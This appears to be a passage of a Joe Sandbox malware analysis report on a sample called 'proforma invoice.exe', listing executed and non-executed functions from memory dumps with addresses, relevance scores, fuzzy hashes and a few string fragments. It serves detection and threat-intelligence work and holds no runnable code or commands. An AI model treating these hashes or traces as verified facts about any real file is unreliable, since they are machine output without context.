Instruction ID: daa0768e428d19ca4df7a3ad462fe38fc7160f75bb622964c68e3233b2935f1b
Opcode Fuzzy Hash: 6129071acbe0700f05f46f3b880ec6a09eddcec26ec97b84ed3d53acd9466f08
Instruction Fuzzy Hash: 92E08C3140A7849FCB12CF74EC48B6ABB70FF17315B06469AC06AC3863E3341864EB65

Function 00AD0848 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a5dede520d6a487ea45531ad90012af6170b03f4cd96f482a646159cfe5a513
Instruction ID: a125edd1e96e4bba5502638e530a12854f88cb3dd8b40319d59c29c9f43baa39
Opcode Fuzzy Hash: 6a5dede520d6a487ea45531ad90012af6170b03f4cd96f482a646159cfe5a513
Instruction Fuzzy Hash: 2CC012314023089BCB00DFB59808B6A7698E716211F0108A99519C3151E6350484FA95

Function 00AD26D7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 674f46b410f6fadb3f07d886973b32d4232eda3166a5462b72dee7bcd95b88ae
Instruction ID: a02681f89a392a8a7acd3285e203a72c354ad3c5dbe791ca3e0f408db719d0fb
Opcode Fuzzy Hash: 674f46b410f6fadb3f07d886973b32d4232eda3166a5462b72dee7bcd95b88ae
Instruction Fuzzy Hash: 5ED06778900258DFDB11CF90D9549ADBBB1FB49302F204599D809AB310C7359E85DF00

Function 00AD29BA Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59c298df8620ab69da636dd27308220495257c12ca220d89935a4107f7f65f2
Instruction ID: 09a4a976113d4d734676ccbd2d13af9cfc7d940dbee398a0a01ba1f1b33c0bb7
Opcode Fuzzy Hash: c59c298df8620ab69da636dd27308220495257c12ca220d89935a4107f7f65f2
Instruction Fuzzy Hash: 7DD0C970605345CFC704CBA4D64196ABBB2AB99302B208859E00ADB364D738E985CF04

Function 00ADEEF0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e6f6b3ff600f27d3a2a8f1f989d1b6aabed46e744f31055941a9d96ae3bc2c2
Instruction ID: 570c3b1e69927af84300ccf83257b49fa3a58583702192fc5b7f0c48ddea20b7
Opcode Fuzzy Hash: 7e6f6b3ff600f27d3a2a8f1f989d1b6aabed46e744f31055941a9d96ae3bc2c2
Instruction Fuzzy Hash: 2DB0927542620C8FC3449F65B0471107BA8B2846007C04426D80C82284EB3A11808A50

Non-executed Functions

Function 00AD4F18 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

K(ze, xrefs: 00AD5133
K(ze, xrefs: 00AD512C

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID: K(ze$K(ze
API String ID: 0-645833744
Opcode ID: f3e900631cd9851ec99eaba12f987f1ff0a5fb07428c251496565b03016013fc
Instruction ID: dc84de13c321ad8b9a3b3fb292b8d3352bea25a09d9b41e96dafec42fa4d43da
Opcode Fuzzy Hash: f3e900631cd9851ec99eaba12f987f1ff0a5fb07428c251496565b03016013fc
Instruction Fuzzy Hash: C071C4B5E0420ADFCB04CFA9D5809AEFBB1FF88310F24951AD416AB315D730A942CF95

Function 00AD4F14 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

K(ze, xrefs: 00AD5133

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID: K(ze
API String ID: 0-3003585491
Opcode ID: 4f9c52b701c06a23a247a184641ab643507b6af65fe8c0cce99173e2abf4474a
Instruction ID: 4ca89c193e7837bce3a52a6fff2ec877353c2d2b892d1e5b6c8e867fab129c84
Opcode Fuzzy Hash: 4f9c52b701c06a23a247a184641ab643507b6af65fe8c0cce99173e2abf4474a
Instruction Fuzzy Hash: E761D375E0524A9FCB04CFA9C5809AEFBF2FF88350F24852AD416A7315D730A982CF95

Function 00AD5A40 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

*^=i, xrefs: 00AD5B3F

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID: *^=i
API String ID: 0-3597599422
Opcode ID: d2cacd640478da1d57bf37ec040d88ca7a8848a7306ea928554636b6b564c518
Instruction ID: 032c4d40fdc4ccda64cc2d198299fee2963b1c27a0993b72d12ac436e775d188
Opcode Fuzzy Hash: d2cacd640478da1d57bf37ec040d88ca7a8848a7306ea928554636b6b564c518
Instruction Fuzzy Hash: F441E774E0561ADFCB08CFAAC5855AEFBB2BF88340F24D56AC419B7314E3349A419F94

Function 09463810 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1edca5dc54de0fcbf3a25ccdab400683f2f0c0c238f896dc9ae5d30b4085df41
Instruction ID: 3d408117c1066fa2cca0ac4f79b7c6a6582cb97de2ab2f4fe73038b9dd561059
Opcode Fuzzy Hash: 1edca5dc54de0fcbf3a25ccdab400683f2f0c0c238f896dc9ae5d30b4085df41
Instruction Fuzzy Hash: EDE119B4E002598FDB14DFA9C580AAEFBB2FF89300F24826AE405A7355D7359D41CFA1

Function 09464080 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98e2bf36ee93c8bb67bfab138819214e0783f08562c9d6f64dd010490b03ef1d
Instruction ID: 1cf4b3cbf9b5d8ed23e403d4eee845db3749e1ff4f594d6009a27bb95f0b55ca
Opcode Fuzzy Hash: 98e2bf36ee93c8bb67bfab138819214e0783f08562c9d6f64dd010490b03ef1d
Instruction Fuzzy Hash: 56E106B4E002198FDB14DFA8C580AAEFBB2FF89304F24816AD415AB365D7319D41CFA1

Function 094633D8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ee4093526391abd14b9b31000690aab6f929fcf890822c2fcf8df347c5c9518
Instruction ID: 255f7bc44d446c2d8582171a79b5706225721ca42a41ac864110b88c625148bd
Opcode Fuzzy Hash: 7ee4093526391abd14b9b31000690aab6f929fcf890822c2fcf8df347c5c9518
Instruction Fuzzy Hash: 30E1F7B4E002598FDB14DFA9C580AAEFBB2FF89301F24816AD405AB355D735AD41CFA1

Function 09463C48 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ebc0868ca4347a1786ea86be6b252c0ff8b60b9a1bd458a12cf0aebb5ec3212
Instruction ID: b256bbe25fb7bdc8fd8f909d43c04a27b3be1cea7fd6e7d9904dee36ffc648a2
Opcode Fuzzy Hash: 4ebc0868ca4347a1786ea86be6b252c0ff8b60b9a1bd458a12cf0aebb5ec3212
Instruction Fuzzy Hash: 98E118B4E002598FDB14DFA8D580AAEFBB2FF89304F24816AD415AB355C735AD41CFA1

Function 094654E8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d60f9babd5d13168b3eddf159e83531d2a57e1f3116b9cb38ad3afe2315a50
Instruction ID: 493feef6a016d56f8189e9060aae2b8253576c2fad7bae220fa592362c2118fb
Opcode Fuzzy Hash: 93d60f9babd5d13168b3eddf159e83531d2a57e1f3116b9cb38ad3afe2315a50
Instruction Fuzzy Hash: EFE1E7B4E00219CFDB14DFA9C580AAEFBB2FF89304F24816AE415AB355D6359D41CFA1

Function 00AD43C0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f7ceb901ecaf78a82d098b0f9c625efe88bea3af80e5b6661e70462dc78c2a
Instruction ID: c4fc94193793c164abcf68d62a0ae10a63f50cf6891f757847ef79db1377ee82
Opcode Fuzzy Hash: f4f7ceb901ecaf78a82d098b0f9c625efe88bea3af80e5b6661e70462dc78c2a
Instruction Fuzzy Hash: 1471BE74E152099FCB48CFA9D58499EFBF1FF88310F14956AE41AAB324D734AA41CF50

Function 00AD43BB Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ebac97b28f1136c973ed8210b34be135d320544a2e6ebece0838395962328dc
Instruction ID: 8f1d23d443189f7f7da0007b718075ff166bdde8ffd2ef61b221b496b0a4bcc6
Opcode Fuzzy Hash: 2ebac97b28f1136c973ed8210b34be135d320544a2e6ebece0838395962328dc
Instruction Fuzzy Hash: 0F71BE74E162099FCB48CFA9D48499EFBF1FF88310F14856AE416AB324D734AA85CF50

Function 00AD57E0 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaa64e9b42343bec371aa2ba71f0331dde26fc024e24c5e98908f69acd4e4855
Instruction ID: 45552bae5d7a2ddcbd5c49008c465289c58031451eb204400e915db6cbaa2bb9
Opcode Fuzzy Hash: eaa64e9b42343bec371aa2ba71f0331dde26fc024e24c5e98908f69acd4e4855
Instruction Fuzzy Hash: 0761C274E05609CBCB08CFAAC5819DEFBF2BF88350F24942AD416B7324D7749A419F64

Function 00AD57D1 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 162b7ffd152276586e746a5e6140f5337cf8c98c30d7c466d404145cf526e175
Instruction ID: d5cf5d4e9c56fceb05363168c7a5a29870d3974d7567afcfc75efbada8b14e46
Opcode Fuzzy Hash: 162b7ffd152276586e746a5e6140f5337cf8c98c30d7c466d404145cf526e175
Instruction Fuzzy Hash: 6961F174E09609CFCB08CFA9C5809EEFBF2AF89350F24946AD416B7324D7749A41DB64

Function 094633AA Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e05c8ab57495cdb127ee5d8586b92c0ff7cbd395cc2cb68a9a3eb5a056f2eb
Instruction ID: 0bf836eb73ef52edb4094d1fbdb3aa7e8778ff71881de170faf011152a5cfd3b
Opcode Fuzzy Hash: 51e05c8ab57495cdb127ee5d8586b92c0ff7cbd395cc2cb68a9a3eb5a056f2eb
Instruction Fuzzy Hash: B6514C74E006598FCB19CF69C5805AEFBB2FF89300F24816AD409AB366D6319D42CFA1

Function 00AD5588 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5daec06c6c12d480e8009186367489d5693d3c490f08aeffd483de638b32d3
Instruction ID: 1b7634906e9e917718fd8c09831a5cbe69e238d2fc371493026eb7561422d732
Opcode Fuzzy Hash: dc5daec06c6c12d480e8009186367489d5693d3c490f08aeffd483de638b32d3
Instruction Fuzzy Hash: 70510AB1D0460ADFCB08CFAAD5815AEFBF2EF88340F24D56AC416A7354D7349A428F94

Analysis Process: proforma invoice.exePID: 7644, Parent PID: 7852COMMON

Executed Functions

Function 07230040 Relevance: 2.8, Instructions: 2813COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889bdbdfd4c886ad5b7902c48356a82e04f9ea27beb62fb40a3c91ba10d70156
Instruction ID: eb001a0f3bb5e79a085811a96a64a04b3590d68996c15e7dc38df6d7f334bae1
Opcode Fuzzy Hash: 889bdbdfd4c886ad5b7902c48356a82e04f9ea27beb62fb40a3c91ba10d70156
Instruction Fuzzy Hash: 4253EA71D10B1A8ADB11EF68C8845A9F7B1FF99300F11D79AE45877221EB70AAD4CF81

Function 072332E0 Relevance: 2.3, Instructions: 2306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5413b8941aa1b50c2c7296df45b73baf8e8b94e825fbb6a3d7992a0f6185df
Instruction ID: 2d91c6e1fe15556fa512e420896483c9f33f63e5bc885197869eaa73ba0b079e
Opcode Fuzzy Hash: 2b5413b8941aa1b50c2c7296df45b73baf8e8b94e825fbb6a3d7992a0f6185df
Instruction Fuzzy Hash: B5333E71D1071A8EDB11EF68C8846ADF7B1FF89300F15C79AE459A7211EB70AAC5CB81

Function 072387E8 Relevance: 1.8, Strings: 1, Instructions: 586COMMON

Download Yara Rule

Strings

$, xrefs: 07238B7F

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 2ff67e84c520e8cc09e0a6134c281386ed4c462cc40b4d7acfb17f1767e9af68
Instruction ID: a7a1b134c125f95814726183143130e6107c5ecc57b23f73d98e7209a0276f08
Opcode Fuzzy Hash: 2ff67e84c520e8cc09e0a6134c281386ed4c462cc40b4d7acfb17f1767e9af68
Instruction Fuzzy Hash: ED22A2B1F1021A8FDF24DBA4C4906AEB7B2FB85310F248469E455EF340DA35ED46CBA1

Function 072359C0 Relevance: 1.5, Instructions: 1483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 819a28bc63b6d095964e6d371cd3f88e3b6ca40c7348dd519229b18212d6f1c9
Instruction ID: ef3b04c02bee3f3bc2d741aeaca60ef4bb65bd399b14a853953a7b1342f765e4
Opcode Fuzzy Hash: 819a28bc63b6d095964e6d371cd3f88e3b6ca40c7348dd519229b18212d6f1c9
Instruction Fuzzy Hash: C0D26AB4A1020ACFDB24DF68C594A9DB7B2FF89304F15C56AE449AB261DB35ED81CF40

Function 07239C48 Relevance: .8, Instructions: 806COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bc4d7a334fb36ede92eb711db83f183e45ae41bee7d460c514e7ada216c792
Instruction ID: 34b3399b1d61d55d7dee8041e6f68c5b83fce8cbde8c3de270a8b5c521c110a3
Opcode Fuzzy Hash: 08bc4d7a334fb36ede92eb711db83f183e45ae41bee7d460c514e7ada216c792
Instruction Fuzzy Hash: EE625CB4B20206CFDB14DB68D594AADB7F2EF89314F148569E44ADB350DB75EC82CB40

Function 0723E888 Relevance: .8, Instructions: 770COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56073480162ac96fdd55735cb32702ca2b3a5d5b534e8ba2a3d963bc05995036
Instruction ID: 92e71e473635cce24d74a602f160a8c011ae9debb9cc5d6bd5ffd0ac98125f43
Opcode Fuzzy Hash: 56073480162ac96fdd55735cb32702ca2b3a5d5b534e8ba2a3d963bc05995036
Instruction Fuzzy Hash: CE527FF0F1020B8FEB24CB68D5947ADB7B2FB85310F658426E409EB391DA75DC858B91

Function 05E3D1C8 Relevance: .6, Instructions: 613COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae66cfd6a2f869bcb295f877354dccf623a9e73e874d908084562f236caf1745
Instruction ID: 4b11abab0c187253571b9ec3026dc2757f43549db5a0db7b7d5660af19bd8643
Opcode Fuzzy Hash: ae66cfd6a2f869bcb295f877354dccf623a9e73e874d908084562f236caf1745
Instruction Fuzzy Hash: 00326C74B04205CFEB14DF68D989AADB7B2FF88354F24856AE84ADB350DA71DC41CB90

Function 0723B3D0 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57f797308a3f2d315051f6d78ccfc15d1acd0002380488e8fdcfc561eb6d5f73
Instruction ID: 2b76691aa86204412b2ae9afb708b9334cbc7ac0f20010e243d9205501d70ac1
Opcode Fuzzy Hash: 57f797308a3f2d315051f6d78ccfc15d1acd0002380488e8fdcfc561eb6d5f73
Instruction Fuzzy Hash: 11026BB0B1020ACFDB14DF68D494AAEB7B2FF89315F148569D806DB351DB75ED428B80

Function 07230006 Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd5f8b5071ff7900b899d829209f9321ff5ef5094f88702cd5d4fba0d7b995c9
Instruction ID: 2ef16e1ca165435259c23b65ca5e5bcc017f0725c311753e869623b88d872649
Opcode Fuzzy Hash: dd5f8b5071ff7900b899d829209f9321ff5ef5094f88702cd5d4fba0d7b995c9
Instruction Fuzzy Hash: FEF12A71D20B5A8EDB11EB68C8505A9F7B1FF99300F15C79AE09877211FB70AAC5CB81

Function 015B3690 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be5f8adfca21420ffd15c27610116c378a7dd3c499d206e80950d5410045c2ae
Instruction ID: 7ff96ab7129397ef7d3f00d091279b18624096160c4dd2e6fe522a05248d1c96
Opcode Fuzzy Hash: be5f8adfca21420ffd15c27610116c378a7dd3c499d206e80950d5410045c2ae
Instruction Fuzzy Hash: 1EE12935600B059FD766CF68C8C4BDAB7E2FF88310F188A28D59A9B255DB30F855CB90

Function 05E37018 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8f2ff915bdc5e598ef39ed21a271af4245b7e575e9acfe7c67a18a7e0ba802
Instruction ID: 2b0b93759a7f99512a07b8cd6650786eddd004dad2876d724a07d565506c7aac
Opcode Fuzzy Hash: 4b8f2ff915bdc5e598ef39ed21a271af4245b7e575e9acfe7c67a18a7e0ba802
Instruction Fuzzy Hash: C7D16FB1E00209CFDB14DFA8D485AAEFBF2FF88314F14855AE855AB351DB34A945CB90

Function 015B72D0 Relevance: 1.8, Strings: 1, Instructions: 525COMMON

Download Yara Rule

Strings

, xrefs: 015B788F

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3f17cebb5ceec29c6cf574f7bc52cc450b310094b05f5f9748a2cab3f244cdbb
Instruction ID: 95c11e317b388030683335a66cd6fd21dd890c6174ad76dfe944486274a5d12b
Opcode Fuzzy Hash: 3f17cebb5ceec29c6cf574f7bc52cc450b310094b05f5f9748a2cab3f244cdbb
Instruction Fuzzy Hash: 59223975A04A16CFDB25CF68C484AEEBBF5FF88300F14491AD55ADB290DB34E942CB91

Function 015B79C1 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

], xrefs: 015B7D18

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID: ]
API String ID: 0-3352871620
Opcode ID: 074bd300471346e2d3a2e1ce83980c156b4a9d0bf84c841e4cdf97af39746359
Instruction ID: 40fe4a6e4b71eee53b3043fcddb7ee8d6e24c84c08506fa0666de224ba1c89e9
Opcode Fuzzy Hash: 074bd300471346e2d3a2e1ce83980c156b4a9d0bf84c841e4cdf97af39746359
Instruction Fuzzy Hash: A802F870A0061ACFDB25CFA8C5C4AFEB7F1FF88304F148959D56AAB295D730A985CB50

Function 05E3E5B0 Relevance: .8, Instructions: 802COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55313753cc7edd622dc773122297b5f3fc56ae2ba97bc46386cb1d69eceae40f
Instruction ID: 33537ead27822f82a30bb09e36efb844f090451737ee892448c1624b149cb3ba
Opcode Fuzzy Hash: 55313753cc7edd622dc773122297b5f3fc56ae2ba97bc46386cb1d69eceae40f
Instruction Fuzzy Hash: D9624A70B0020ACFDB15DB68E898A5EB3F2FF85304B248A69D4459F365DB75EC46CB81

Function 015B4908 Relevance: .7, Instructions: 724COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1bb8a184ff3d901c6dd20c0d407b40e88119b6233a062611ff6b7d8c775078a
Instruction ID: 11fb7d6d58a27f4b66fa32ce18c3f204f98bd35be7c463e3bac45844a319933c
Opcode Fuzzy Hash: a1bb8a184ff3d901c6dd20c0d407b40e88119b6233a062611ff6b7d8c775078a
Instruction Fuzzy Hash: 26623634A04615CFDB26CF28D488BEEBBF2FB88301F148559D99A9B356DB34A841CF50

Function 015B8A20 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aba4d668c899f1f130ed9d59496519e0a67beed72427311cc417f15ef852b26
Instruction ID: 0b53b6b35c547051a2be76bfa8fcb539b8c442f224221574fde3dda6ef43fcba
Opcode Fuzzy Hash: 2aba4d668c899f1f130ed9d59496519e0a67beed72427311cc417f15ef852b26
Instruction Fuzzy Hash: 27524974A00605CFCB25CF68D9C4AEEBBF5FF88304F1485AAD95A9F256D730A881CB50

Function 05E3B358 Relevance: .6, Instructions: 553COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f49afe0c09f67261479db5ce6a5c4b8017d0566a4f7a239ce53da8b128fcc4
Instruction ID: ed25b5d4d317a2d53fcb8e7901343fdc0344351b47ea80d600e1fced9b408f79
Opcode Fuzzy Hash: 01f49afe0c09f67261479db5ce6a5c4b8017d0566a4f7a239ce53da8b128fcc4
Instruction Fuzzy Hash: BC1272307003069BDF95AB28E89AA2C73A7FBCA359B504939E406CB364DF35DC56C781

Function 05E3B368 Relevance: .6, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eaf437288c2c6b90962b54388eb3e41542fd1b69c8dc437f1bc44fe8bc3d01c
Instruction ID: 6a6480903ce52ffb4290c54f6d986aa0a4ef05dc69a7e7690ba0c36237539ec5
Opcode Fuzzy Hash: 7eaf437288c2c6b90962b54388eb3e41542fd1b69c8dc437f1bc44fe8bc3d01c
Instruction Fuzzy Hash: EE1262307003069BDF95AB28E89AA2C77A7FBCA359B504939E406CB364DE35DC46C781

